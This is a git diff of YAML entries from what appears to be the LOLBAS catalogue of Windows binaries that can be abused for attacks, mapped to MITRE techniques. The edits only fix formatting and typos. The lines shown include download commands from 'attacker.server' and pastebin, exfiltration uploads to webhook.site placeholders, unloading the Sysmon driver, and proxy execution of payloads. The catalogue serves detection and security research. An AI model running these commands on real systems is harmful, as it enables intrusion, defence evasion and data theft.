diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ef362a1..6c24632 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -2,7 +2,7 @@ Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' -Created: '2020-12-02' +Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index feb81ea..b0f2d8a 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. Category: Execute Privileges: User MitreID: T1218 diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index ac47b2f..2f8be4c 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -2,7 +2,7 @@ Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index bd739c3..1991f85 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows Author: 'Ialle Teixeira' Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..37a1028 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -2,9 +2,9 @@ Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. Author: 'Ialle Teixeira' -Created: '01/12/2020' +Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml index beda52f..7dc777c 100644 --- a/yml/OSBinaries/Dllhost.yml +++ b/yml/OSBinaries/Dllhost.yml @@ -2,7 +2,7 @@ Name: Dllhost.exe Description: Used by Windows to DLL Surrogate COM Objects Author: 'Nasreddine Bencherchali' -Created: '2020-11-07' +Created: 2020-11-07 Commands: - Command: dllhost.exe /Processid:{CLSID} Description: Use dllhost.exe to load a registered or hijacked COM Server payload. diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 45eebef..f439bbd 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -2,7 +2,7 @@ Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: 'John Lambert' -Created: '2021-09-18' +Created: 2021-09-18 Commands: - Command: fltMC.exe unload SysmonDrv Description: Unloads a driver used by security agents diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index d39d734..ab11f79 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -2,7 +2,7 @@ Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module Author: 'Wade Hickey' -Created: '2020-03-05' +Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..10b5fa4 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe Description: Download file to machine and store it in Alternate Data Stream Usecase: Hide downloaded data inton an Alternate Data Stream Category: ADS diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index 966fe84..a400cc1 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -2,7 +2,7 @@ Name: OfflineScannerShell.exe Description: Windows Defender Offline Shell Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: OfflineScannerShell Description: Execute mpclient.dll library in the current working directory diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..8c69fcb 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -2,7 +2,7 @@ Name: OneDriveStandaloneUpdater.exe Description: OneDrive Standalone Updater Author: 'Elliot Killick' -Created: '2021-08-22' +Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 033961e..c39d6ce 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -2,7 +2,7 @@ Name: PrintBrm.exe Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' -Created: '2021-06-21' +Created: 2021-06-21 Commands: - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..6c4d9fe 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -2,7 +2,7 @@ Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: SettingSyncHost -LoadAndRunDiagScript anything Description: Execute file specified in %COMSPEC% diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index fdd8ef0..7f686cf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -2,7 +2,7 @@ Name: Stordiag.exe Description: Storage diagnostic tool Author: 'Eral4m' -Created: '2021-10-21' +Created: 2021-10-21 Commands: - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 00b3f33..f13d7ac 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -2,7 +2,7 @@ Name: WorkFolders.exe Description: Work Folders Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: WorkFolders Description: Execute control.exe in the current working directory diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 34f939d..ba04167 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..02264de 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..f344462 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,12 +1,12 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: Jimmy (@bohops) Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 5a55cf1..3f8748e 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -4,7 +4,7 @@ Description: Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..9bfebcb 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -4,7 +4,7 @@ Description: Aero diagnostics script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..9d851cf 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -2,7 +2,7 @@ Name: Procdump(64).exe Description: SysInternals Memory Dump Tool Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' +Created: 2020-10-14 Commands: - Command: procdump.exe -md calc.dll explorer.exe Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..38c1052 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -2,7 +2,7 @@ Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: 'timwhite' -Created: '2021-09-24' +Created: 2021-09-24 Commands: - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" Description: The above binary will execute other binary.